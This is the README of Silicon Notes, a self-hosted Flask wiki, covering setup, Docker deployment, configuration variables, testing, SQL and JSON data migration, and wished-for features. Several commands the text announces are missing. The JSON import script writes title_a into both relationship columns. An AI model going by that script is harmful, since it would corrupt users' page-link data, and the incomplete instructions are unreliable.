*   Poetry for project management.
*   Flask, the micro-framework.
*   Mistune to render Markdown into HTML.
*   Pygments for syntax highlighting of code blocks.
*   python-slugify creates URL-friendly "slugs" from strings.
*   python-dotenv for configuration management.
*   Gunicorn for deployment.
*   Pytest and Beautiful Soup for functional testing.
*   CodeMirror (optional) for editor syntax highlighting

**Quickstart**

This project is configured and deployed much like any other Flask project. For details, see the Flask configuration handling Docs.

**Docker or Podman**

If you want to take this for a quick spin, the following commands should get you going. You obviously need to have Docker installed. (If you have Podman, simply substitute docker for podman.)

docker run \\
  -ti \\
  --rm \\
  -p 127.0.0.1:5000:5000 \\
  -v silicon\_instance:/home/silicon/instance \\
  docker.io/bityard/silicon

And then open http://localhost:5000/ with your local web browser.

You could also start it with docker-compose (or docker compose):

cd deploy/docker-local
docker-compose up

If you want to build the image, a Dockerfile and a docker-compose.yaml file are provided, so you can build the container with:

docker build -t docker.io/bityard/silicon .

Or with buildah:

buildah build --format docker -t docker.io/bityard/silicon .

Silicon will listen on port 5000 (plaintext HTTP) and stores all application data in /home/silicon/instance.

**Development****Prerequisites**

This project requires Python 3.9 or greater. On a Debian/Ubuntu system, that means the following packages:

*   python3
*   python3-pip (unless installed via other means)
*   python3-dev
*   python3-venv
*   npm (or docker) (optional to enable CodeMirror editor)

Install Poetry if necessary. Everyone has their own way of setting up their Python tooling but I'm a fan of pipx:

pip3 install --user pipx
pipx install poetry

**Setup**

Use poetry to create a virtual environment and install the dependencies:

Flask is configured via environment variables. There is a file called .flaskenv which sets the name of the app. If you want to run flask from somewhere else, you will need to set:

All other settings can either be set as environment variables or written to a file named .env in the project root. For development, this will suffice:

FLASK\_ENV=development
WERKZEUG\_DEBUG\_PIN=off

You can set any environment variables mentioned in the Flask or Werkzeug docs, but these are some you might care to know about:

*   FLASK_ENV: production (default), or development
*   FLASK_RUN_HOST: defaults to 127.0.0.1
*   FLASK_RUN_PORT: defaults to 5000
*   INSTANCE_PATH: where the silicon data (in particular the database) is stored
*   WERKZEUG_DEBUG_PIN: the PIN to enable the Werkzeug debug console. Set to "off" to disable it if you are sure the app is only listening on localhost.
*   SECRET_KEY: A string used in session cookies. For development purposes, this can be anything, but for production it should be a 16-byte (or larger) string of random characters. Setting this is optional as the app will create one (and write it to a file in INSTANCE_PATH) if one doesn't exist.
*   SILICON_EDITOR: When set to textarea, this disables the CodeMirror text editor when editing pages and uses a standard textarea element instead.

To initialize the database after the configuration settings have been set, run the following command. It will create an instance directory in the root of the project and initialize the SQLite database from schema.sql.

**Running Silicon**

Run the project via the flask development server:

Unless you changed the defaults, you should be able to access the UI on http://localhost:5000/

**Running tests and flake8**

To run the tests, install the dev dependencies and run pytest:

poetry install --with dev
poetry run pytest

If you have a tmpfs filesystem, you can set the TMP environment variable to have test databases created there (which is faster and results in less wear-and-tear on your disk):

TMP=/dev/shm poetry run pytest

To make sure all code is formatted to flake8 standards, run flake8:

**Production Deployment**

Silicon Notes is a fairly simple web application which contains no built-in authentication or authorization mechanisms whatsoever. If deploying the application on its own, you should only deploy this to a trusted private network such as a local LAN segregated from the public Internet by a firewall or VPN. **If deploying on a public server, you are responsible for ensuring all access to it is secure.**

The deploy direcctory contains various sample deployments that may be helpful as starting points for a production deployment.

Normally, it is easiest to host applications like this on their own domain or subdomain, such as https://silicon.example.com/. If you would rather host it under a prefix instead (as in https://example.com/silicon), see this issue for hints on how to do that.

**Configuring the CodeMirror Editor**

Support for CodeMirror as a text editor is included by default. It does add a lot of "heft" to the UI, mostly around having to make a separate network request for each language and addon specified. To use it, you also have to install third-party Javascript/CSS static packages by running ONE of the following commands:

# If you have \`npm\` installed locally
(cd silicon/static && npm install)

Or:

# if you have \`docker\` installed
docker run -ti --rm -v $PWD/silicon/static:/app -w /app node:alpine npm install

Currently only a handful of languages are enabled for syntax highlighting, if you want to edit the list to suit your needs, you can edit silicon/static/js/edit.js. You can find a list of supported lanauges here.

To disable CodeMirror and use a regular textarea instead, add the following to your .env file or environment:

**Data Export and Import****SQL**

In the event that a database migration is needed, follow these steps:

1.  Stop the Silicon instance.
2.  Pull down the latest version of this repository.
3.  Run scripts/dump.sh > silicon_data.sql.

To import the data:

4.  Move or rename the old instance/silicon.sqlite, if it exists.
5.  Run poetry run flask init-db.
6.  Run sqlite3 instance/silicon.sqlite < silicon_data.sql.
7.  Start the Silicon instance.

Once you are satisfied that there are no issues, you can archive (or delete) the old silicon.sqlite file and silicon_data.sql.

**JSON**

If you want to dump your data as JSON (perhaps to import into another system or hack on with your own tools), these scripts are not well tested but might do the job.

Export:

#!/usr/bin/env sh

DB=instance/silicon.sqlite

for table in pages relationships; do
    sqlite3 $DB -cmd '.mode json' "select \* from $table;" \> $table.json
done

Import:

#!/usr/bin/env sh

sqlite3 instance/silicon.sqlite << EOF
INSERT INTO pages (revision, title, body)
SELECT
    json\_extract(value, '$.revision'),
    json\_extract(value, '$.title'),
    json\_extract(value, '$.body')
FROM json\_each(readfile('pages.json'));
INSERT INTO relationships
SELECT
    json\_extract(value, '$.title\_a'),
    json\_extract(value, '$.title\_a')
FROM json\_each(readfile('relationships.json'));
EOF

**Suggested Contributions****Clean Up CSS**

The current style sheets were more or less arrived at by trial and error. Any help in organizing the rules in a more coherent yet extensible way would be much appreciated.

**Dark Theme**

It would be nice if the CSS adjusted itself to a dark theme based on the preference set by the user in the browser. This should be pretty easy since almost all of the colors are in one file.

**Clean up Javascript**

To put it mildly, my JS skills are not the best. I would very much appreciate any suggestions on improvements to the small amount of code there is, or whether there is a better way to organize it. I won't bring in any kind of Javascript "build" tool as a project dependency, though.

**Diffs Between Revisions**

This is pretty standard on wiki-like apps, but it's not a critical feature for me so I haven't yet mustered up the fortitude to implement it. (It would also likely involve adding a diff library as a dependency.)

**Redirect to Slugified URL**

We currently "slugify" the page title in at least two places:

1.  When building the URL for an internal page link generated from wiki link syntax [[like this]] in render.py.
2.  When processing requests with page titles in the URLs for certain routes in views.py.

In the second case, page titles are slugified immediately, meaning every instance of the page title is slugified in the HTML. However, the URL will still contain the non-slugified title. This is pretty much purely cosmetic, but it would be nice if the application could immediately redirect to a slugified page title instead, if necessary.

I found lots of ugly ways to do this but nothing I was comfortable shipping.

**Draft Feature / Autosave / Leap-frog Detection**

To prevent the loss of unsaved changes while editing, we use the browser's "are you sure?" nag if there has been a change to the editing area since the page was loaded. However, there are still (at least) two opportunies to lose work:

1.  The browser crashes.
2.  Two simulatenous edits of a page in separate tabs or windows.

The first is rare and the second is not as serious since both revisions are saved. But it is currently up to the user to recognize what happened and remedy the situation by hand.

These are technically three separate features but I believe they would be quite closely coupled if implemented together.

**Refine Tests**

The tests directory contains functional tests that were deemed the most important. But they could be better organized and optimized/flexible. Code coverage is not likely very high. Some tests are lacking or missing because I was not able to work out the right way to test certain things.

**Add Anchors to Headings**

Anchors on headers are a very common feature on various CMSes. They let you link directly to headings, e.g.:

http://example.com/view/page\_title#some-section

**Implement a (Better) Task List Plugin**

Mistune (the Markdown->HTML renderer) ships with a task\_lists plugin. It is functional, but it renders task list items inside an ordinary <ol> as just another kind of list item. This means the task list items get prefixed with _both_ a bullet point and a checkbox. IMO, this is fairly ugly and the "right" way to display a task list item is the have the checkbox replace the bullet point.

To do this right, I think task lists should be their own separate kind of list rather than just another item type in regular lists. It should be possible to accomplish this with a Mistune plugin.

Tag

#debian